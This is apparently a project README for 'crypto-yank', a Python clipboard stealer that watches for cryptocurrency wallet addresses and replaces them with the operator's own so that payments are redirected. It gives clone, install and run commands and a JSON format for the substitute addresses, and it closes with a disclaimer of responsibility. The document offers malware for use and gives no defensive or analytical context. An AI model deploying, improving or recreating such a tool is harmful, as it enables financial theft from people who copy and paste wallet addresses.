- Written in Python 3
- Support For:
Bitcoin (Legacy & Segwit),Etherum,Litecoin,Dash,Doge,Ripple and Monero.
- Easy setup script.
- Specific crypto replacement.
crypto-yank is a clipboard stealer that monitors the clipboard for crypto addresses and replaces it with your own. If no address is found in the clipboard crypto-yank does nothing and remains waiting for a valid address to replace.
git clone https://github.com/jacques-andre/crypto-yank
cd crypto-yank
pip3 install -r requirements.txt
python3 setup.py
python3 crypto-yank.py
--verbose
If you don't want to use the setup script you can provide your own addresses.json
in the following format.
Example addresses.json:
{
"legacy_btc": "leg_ad",
"segwit_btc": "seg_ad",
"xmr": "xmr_ad",
"eth": "eth_ad",
"lite": "lite_ad",
"dash": "dash_ad",
"ripple": "ripple_ad",
"doge": "doge_ad"
}
You can also provide the key "NULL"
to specific cryptos if you wish not to monitor them:
{
"legacy_btc": "leg_ad",
"segwit_btc": "seg_ad",
"xmr": "NULL",
"eth": "eth_ad",
"lite": "lite_ad",
"dash": "dash_ad",
"ripple": "ripple_ad",
"doge": "doge_ad"
}
Placing the string "NULL"
for xmr would now ignore that crypto currency.
Bitcoin addresses are mandatory including (segwit and legacy).
Once this file is created in the same directory as crypto-yank.py
you can run crypto-yank.py
to start monitoring.
pyperclip==1.8.0
- Add more cryptos!
- Logging to text file.
- Better video demo.
Warning
I am not responsible for any misuse or damage caused by this program. Use this tool at your own risk!